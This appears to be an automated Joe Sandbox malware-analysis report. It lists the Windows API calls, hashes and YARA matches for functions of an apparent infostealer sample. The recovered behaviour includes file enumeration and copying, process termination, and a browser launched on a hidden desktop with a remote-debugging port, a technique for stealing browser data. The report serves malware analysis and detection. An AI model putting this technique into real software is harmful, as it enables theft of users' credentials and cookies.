                                • Opcode ID: f7d3f28af8621cd5fca10aaa2877b430ce8a61c33001b6b778fc5c3e7c7fd7db
                                • Instruction ID: e3c0868cb1c385e58b48942f3dc3b9c74cfb03696f7d9891b214c786e3456040
                                • Opcode Fuzzy Hash: f7d3f28af8621cd5fca10aaa2877b430ce8a61c33001b6b778fc5c3e7c7fd7db
                                • Instruction Fuzzy Hash: 2392AE71A016018FCB24CF28D458B6AB7F5AF4431AF18D4ADEC49AB3A5D736DC86CB50
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E51291
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E512B4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E512BF
                                • lstrlen.KERNEL32(00E74CA8), ref: 00E512CA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E512E7
                                • lstrcat.KERNEL32(00000000,00E74CA8), ref: 00E512F3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5131E
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00E5133A
                                • StrCmpCA.SHLWAPI(?,00E717A0), ref: 00E5135C
                                • StrCmpCA.SHLWAPI(?,00E717A4), ref: 00E51376
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E513AF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E513D7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E513E2
                                • lstrlen.KERNEL32(00E71794), ref: 00E513ED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5140A
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E51416
                                • lstrlen.KERNEL32(?), ref: 00E51423
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51443
                                • lstrcat.KERNEL32(00000000,?), ref: 00E51451
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5147A
                                • StrCmpCA.SHLWAPI(?,016CD8F8), ref: 00E514A3
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E514E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5150D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51535
                                • StrCmpCA.SHLWAPI(?,016CDDB0), ref: 00E51552
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E51593
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E515BC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E515E4
                                • StrCmpCA.SHLWAPI(?,016CD7C0), ref: 00E51602
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51633
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5165C
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E51685
                                • StrCmpCA.SHLWAPI(?,016CD8B0), ref: 00E516B3
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E516F4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5171D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51745
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E51796
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E517BE
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E517F5
                                • FindNextFileA.KERNEL32(00000000,?), ref: 00E5181C
                                • FindClose.KERNEL32(00000000), ref: 00E5182B
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                • String ID:
                                • API String ID: 1346933759-0
                                • Opcode ID: 14bf88c8dd114b68185fa37fe7e349d69a8f5b79ced0223a6352a71bc57471f2
                                • Instruction ID: cda2eddd751832372342bad52d316f30848c9a5e066f76a1f4e846f7a9d69218
                                • Opcode Fuzzy Hash: 14bf88c8dd114b68185fa37fe7e349d69a8f5b79ced0223a6352a71bc57471f2
                                • Instruction Fuzzy Hash: 4D127471A102069BCB25EF78E889AAE77F8AF44305F44696CFD86F7240DB34DC458B91
                                APIs
                                • wsprintfA.USER32 ref: 00E5CBFC
                                • FindFirstFileA.KERNEL32(?,?), ref: 00E5CC13
                                • lstrcat.KERNEL32(?,?), ref: 00E5CC5F
                                • StrCmpCA.SHLWAPI(?,00E717A0), ref: 00E5CC71
                                • StrCmpCA.SHLWAPI(?,00E717A4), ref: 00E5CC8B
                                • wsprintfA.USER32 ref: 00E5CCB0
                                • PathMatchSpecA.SHLWAPI(?,016C89E8), ref: 00E5CCE2
                                • CoInitialize.OLE32(00000000), ref: 00E5CCEE
                                  • Part of subcall function 00E5CAE0: CoCreateInstance.COMBASE(00E6B110,00000000,00000001,00E6B100,?), ref: 00E5CB06
                                  • Part of subcall function 00E5CAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 00E5CB46
                                  • Part of subcall function 00E5CAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 00E5CBC9
                                • CoUninitialize.COMBASE ref: 00E5CD09
                                • lstrcat.KERNEL32(?,?), ref: 00E5CD2E
                                • lstrlen.KERNEL32(?), ref: 00E5CD3B
                                • StrCmpCA.SHLWAPI(?,00E6CFEC), ref: 00E5CD55
                                • wsprintfA.USER32 ref: 00E5CD7D
                                • wsprintfA.USER32 ref: 00E5CD9C
                                • PathMatchSpecA.SHLWAPI(?,?), ref: 00E5CDB0
                                • wsprintfA.USER32 ref: 00E5CDD8
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 00E5CDF1
                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00E5CE10
                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 00E5CE28
                                • CloseHandle.KERNEL32(00000000), ref: 00E5CE33
                                • CloseHandle.KERNEL32(00000000), ref: 00E5CE3F
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E5CE54
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5CE94
                                • FindNextFileA.KERNEL32(?,?), ref: 00E5CF8D
                                • FindClose.KERNEL32(?), ref: 00E5CF9F
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                                • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                                • API String ID: 3860919712-2388001722
                                • Opcode ID: 1681974893add82a3d9701a0084bd6afae96db2de2a5dc22d521062ef81eddf7
                                • Instruction ID: 744aafb2262f0c6359a94ae1cf51f3fe86850a057e141435d890d24b0a52bb68
                                • Opcode Fuzzy Hash: 1681974893add82a3d9701a0084bd6afae96db2de2a5dc22d521062ef81eddf7
                                • Instruction Fuzzy Hash: 9BC18371A003089FCB24DF64DC59AEE77B9AF44305F109599FA49B7284EB35AE44CFA0
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E51291
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E512B4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E512BF
                                • lstrlen.KERNEL32(00E74CA8), ref: 00E512CA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E512E7
                                • lstrcat.KERNEL32(00000000,00E74CA8), ref: 00E512F3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5131E
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00E5133A
                                • StrCmpCA.SHLWAPI(?,00E717A0), ref: 00E5135C
                                • StrCmpCA.SHLWAPI(?,00E717A4), ref: 00E51376
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E513AF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E513D7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E513E2
                                • lstrlen.KERNEL32(00E71794), ref: 00E513ED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5140A
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E51416
                                • lstrlen.KERNEL32(?), ref: 00E51423
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51443
                                • lstrcat.KERNEL32(00000000,?), ref: 00E51451
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5147A
                                • StrCmpCA.SHLWAPI(?,016CD8F8), ref: 00E514A3
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E514E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5150D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51535
                                • StrCmpCA.SHLWAPI(?,016CDDB0), ref: 00E51552
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E51593
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E515BC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E515E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E51796
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E517BE
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E517F5
                                • FindNextFileA.KERNEL32(00000000,?), ref: 00E5181C
                                • FindClose.KERNEL32(00000000), ref: 00E5182B
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                • String ID:
                                • API String ID: 1346933759-0
                                • Opcode ID: b9d5d96e37eff3c82f250fab3dd74d53fbddbe83bd52b347446ae4a32ddb90bb
                                • Instruction ID: 947dea1c74cca47250455da6ec87e0d5368cfcb8bfc24de8cd935bb159ee239a
                                • Opcode Fuzzy Hash: b9d5d96e37eff3c82f250fab3dd74d53fbddbe83bd52b347446ae4a32ddb90bb
                                • Instruction Fuzzy Hash: 27C16231A102069BCB21EF78E889BAE77F8AF44319F44656CFD45B7241DB34DD498BA0
                                APIs
                                • memset.MSVCRT ref: 00E49790
                                • lstrcat.KERNEL32(?,?), ref: 00E497A0
                                • lstrcat.KERNEL32(?,?), ref: 00E497B1
                                • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 00E497C3
                                • memset.MSVCRT ref: 00E497D7
                                  • Part of subcall function 00E63E70: lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E63EA5
                                  • Part of subcall function 00E63E70: lstrcpy.KERNEL32(00000000,016CE788), ref: 00E63ECF
                                  • Part of subcall function 00E63E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,00E4134E,?,0000001A), ref: 00E63ED9
                                • wsprintfA.USER32 ref: 00E49806
                                • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00E49827
                                • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00E49844
                                  • Part of subcall function 00E646A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00E646B9
                                  • Part of subcall function 00E646A0: Process32First.KERNEL32(00000000,00000128), ref: 00E646C9
                                  • Part of subcall function 00E646A0: Process32Next.KERNEL32(00000000,00000128), ref: 00E646DB
                                  • Part of subcall function 00E646A0: StrCmpCA.SHLWAPI(?,?), ref: 00E646ED
                                  • Part of subcall function 00E646A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E64702
                                  • Part of subcall function 00E646A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00E64711
                                  • Part of subcall function 00E646A0: CloseHandle.KERNEL32(00000000), ref: 00E64718
                                  • Part of subcall function 00E646A0: Process32Next.KERNEL32(00000000,00000128), ref: 00E64726
                                  • Part of subcall function 00E646A0: CloseHandle.KERNEL32(00000000), ref: 00E64731
                                • lstrcat.KERNEL32(00000000,?), ref: 00E49878
                                • lstrcat.KERNEL32(00000000,?), ref: 00E49889
                                • lstrcat.KERNEL32(00000000,00E74B60), ref: 00E4989B
                                • memset.MSVCRT ref: 00E498AF
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00E498D4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E49903
                                • StrStrA.SHLWAPI(00000000,016CEC78), ref: 00E49919
                                • lstrcpyn.KERNEL32(010793D0,00000000,00000000), ref: 00E49938
                                • lstrlen.KERNEL32(?), ref: 00E4994B
                                • wsprintfA.USER32 ref: 00E4995B
                                • lstrcpy.KERNEL32(?,00000000), ref: 00E49971
                                • Sleep.KERNEL32(00001388), ref: 00E499E7
                                  • Part of subcall function 00E41530: lstrcpy.KERNEL32(00000000,?), ref: 00E41557
                                  • Part of subcall function 00E41530: lstrcpy.KERNEL32(00000000,?), ref: 00E41579
                                  • Part of subcall function 00E41530: lstrcpy.KERNEL32(00000000,?), ref: 00E4159B
                                  • Part of subcall function 00E41530: lstrcpy.KERNEL32(00000000,?), ref: 00E415FF
                                  • Part of subcall function 00E492B0: strlen.MSVCRT ref: 00E492E1
                                  • Part of subcall function 00E492B0: strlen.MSVCRT ref: 00E492FA
                                  • Part of subcall function 00E492B0: strlen.MSVCRT ref: 00E49399
                                  • Part of subcall function 00E492B0: strlen.MSVCRT ref: 00E493E6
                                  • Part of subcall function 00E64740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00E64759
                                  • Part of subcall function 00E64740: Process32First.KERNEL32(00000000,00000128), ref: 00E64769
                                  • Part of subcall function 00E64740: Process32Next.KERNEL32(00000000,00000128), ref: 00E6477B
                                  • Part of subcall function 00E64740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E6479C
                                  • Part of subcall function 00E64740: TerminateProcess.KERNEL32(00000000,00000000), ref: 00E647AB
                                  • Part of subcall function 00E64740: CloseHandle.KERNEL32(00000000), ref: 00E647B2
                                  • Part of subcall function 00E64740: Process32Next.KERNEL32(00000000,00000128), ref: 00E647C0
                                  • Part of subcall function 00E64740: CloseHandle.KERNEL32(00000000), ref: 00E647CB
                                • CloseDesktop.USER32(?), ref: 00E49A1C
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                                • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                                • API String ID: 958055206-1862457068
                                • Opcode ID: bc4c74f83aba2f32f8a8dbd20067cb4e6ff30eebe0ad2f96826deb2b0e935c6a
                                • Instruction ID: f377e2c18bdfff94e6fa60f3d6d0f64f7ed0098c6bdf9f57b2e759a41ee178b5
                                • Opcode Fuzzy Hash: bc4c74f83aba2f32f8a8dbd20067cb4e6ff30eebe0ad2f96826deb2b0e935c6a
                                • Instruction Fuzzy Hash: 00918471A50208AFDB20DF74DC49FDE77B8AF48704F508099FA49B7281DB75AA448BA0
                                APIs
                                • wsprintfA.USER32 ref: 00E5E22C
                                • FindFirstFileA.KERNEL32(?,?), ref: 00E5E243
                                • StrCmpCA.SHLWAPI(?,00E717A0), ref: 00E5E263
                                • StrCmpCA.SHLWAPI(?,00E717A4), ref: 00E5E27D
                                • wsprintfA.USER32 ref: 00E5E2A2
                                • StrCmpCA.SHLWAPI(?,00E6CFEC), ref: 00E5E2B4
                                • wsprintfA.USER32 ref: 00E5E2D1
                                  • Part of subcall function 00E5EDE0: lstrcpy.KERNEL32(00000000,?), ref: 00E5EE12
                                • wsprintfA.USER32 ref: 00E5E2F0
                                • PathMatchSpecA.SHLWAPI(?,?), ref: 00E5E304
                                • lstrcat.KERNEL32(?,016CF2B8), ref: 00E5E335
                                • lstrcat.KERNEL32(?,00E71794), ref: 00E5E347
                                • lstrcat.KERNEL32(?,?), ref: 00E5E358
                                • lstrcat.KERNEL32(?,00E71794), ref: 00E5E36A
                                • lstrcat.KERNEL32(?,?), ref: 00E5E37E
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 00E5E394
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5E3D2
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5E422
                                • DeleteFileA.KERNEL32(?), ref: 00E5E45C
                                  • Part of subcall function 00E41530: lstrcpy.KERNEL32(00000000,?), ref: 00E41557
                                  • Part of subcall function 00E41530: lstrcpy.KERNEL32(00000000,?), ref: 00E41579
                                  • Part of subcall function 00E41530: lstrcpy.KERNEL32(00000000,?), ref: 00E4159B
                                  • Part of subcall function 00E41530: lstrcpy.KERNEL32(00000000,?), ref: 00E415FF
                                • FindNextFileA.KERNEL32(00000000,?), ref: 00E5E49B
                                • FindClose.KERNEL32(00000000), ref: 00E5E4AA
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                • String ID: %s\%s$%s\*
                                • API String ID: 1375681507-2848263008
                                • Opcode ID: 688ad3edef8fa1164a34f576f9de19acf9feaaca65585b08e0c814ed43ee0cc8
                                • Instruction ID: 681f89350d0ab1c83cb268320b53049ac9fbc1014a68aac1689874d67478ae3b
                                • Opcode Fuzzy Hash: 688ad3edef8fa1164a34f576f9de19acf9feaaca65585b08e0c814ed43ee0cc8
                                • Instruction Fuzzy Hash: 3C819671D102189BCB24EF74DC49AEE77B9BF44304F009999B959B3245DB35AB48CFA0
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E416E2
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E41719
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4176C
                                • lstrcat.KERNEL32(00000000), ref: 00E41776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E417A2
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E418F3
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E418FE
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat
                                • String ID: \*.*
                                • API String ID: 2276651480-1173974218
                                • Opcode ID: f9d958ec440645ea5bca129e7f4d9f86c616aa7181d0da3675040e2c5d8efa98
                                • Instruction ID: 86cad7420c73278768b6185092c8b7a3867105c54f924cd8351dc8432fd949a3
                                • Opcode Fuzzy Hash: f9d958ec440645ea5bca129e7f4d9f86c616aa7181d0da3675040e2c5d8efa98
                                • Instruction Fuzzy Hash: 948190309102099FCF21EF68F889AAE7BF4AF44318F446169FA45B7245DB34ED41CBA1
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00E5DD45
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E5DD4C
                                • wsprintfA.USER32 ref: 00E5DD62
                                • FindFirstFileA.KERNEL32(?,?), ref: 00E5DD79
                                • StrCmpCA.SHLWAPI(?,00E717A0), ref: 00E5DD9C
                                • StrCmpCA.SHLWAPI(?,00E717A4), ref: 00E5DDB6
                                • wsprintfA.USER32 ref: 00E5DDD4
                                • DeleteFileA.KERNEL32(?), ref: 00E5DE20
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 00E5DDED
                                  • Part of subcall function 00E41530: lstrcpy.KERNEL32(00000000,?), ref: 00E41557
                                  • Part of subcall function 00E41530: lstrcpy.KERNEL32(00000000,?), ref: 00E41579
                                  • Part of subcall function 00E41530: lstrcpy.KERNEL32(00000000,?), ref: 00E4159B
                                  • Part of subcall function 00E41530: lstrcpy.KERNEL32(00000000,?), ref: 00E415FF
                                  • Part of subcall function 00E5D980: memset.MSVCRT ref: 00E5D9A1
                                  • Part of subcall function 00E5D980: memset.MSVCRT ref: 00E5D9B3
                                  • Part of subcall function 00E5D980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00E5D9DB
                                  • Part of subcall function 00E5D980: lstrcpy.KERNEL32(00000000,?), ref: 00E5DA0E
                                  • Part of subcall function 00E5D980: lstrcat.KERNEL32(?,00000000), ref: 00E5DA1C
                                  • Part of subcall function 00E5D980: lstrcat.KERNEL32(?,016CEC60), ref: 00E5DA36
                                  • Part of subcall function 00E5D980: lstrcat.KERNEL32(?,?), ref: 00E5DA4A
                                  • Part of subcall function 00E5D980: lstrcat.KERNEL32(?,016CD838), ref: 00E5DA5E
                                  • Part of subcall function 00E5D980: lstrcpy.KERNEL32(00000000,?), ref: 00E5DA8E
                                  • Part of subcall function 00E5D980: GetFileAttributesA.KERNEL32(00000000), ref: 00E5DA95
                                • FindNextFileA.KERNEL32(00000000,?), ref: 00E5DE2E
                                • FindClose.KERNEL32(00000000), ref: 00E5DE3D
                                • lstrcat.KERNEL32(?,016CF2B8), ref: 00E5DE66
                                • lstrcat.KERNEL32(?,016CDE10), ref: 00E5DE7A
                                • lstrlen.KERNEL32(?), ref: 00E5DE84
                                • lstrlen.KERNEL32(?), ref: 00E5DE92
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5DED2
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
